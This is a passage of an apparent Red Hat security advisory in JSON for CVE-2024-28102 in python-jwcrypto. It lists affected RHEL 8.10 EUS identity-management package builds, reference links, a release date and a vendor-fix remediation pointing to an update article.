"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-28102"
},
{
"category": "external",
"summary": "RHBZ#2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-28102",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28102"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
}
],
"release_date": "2024-03-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-22T11:47:22+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
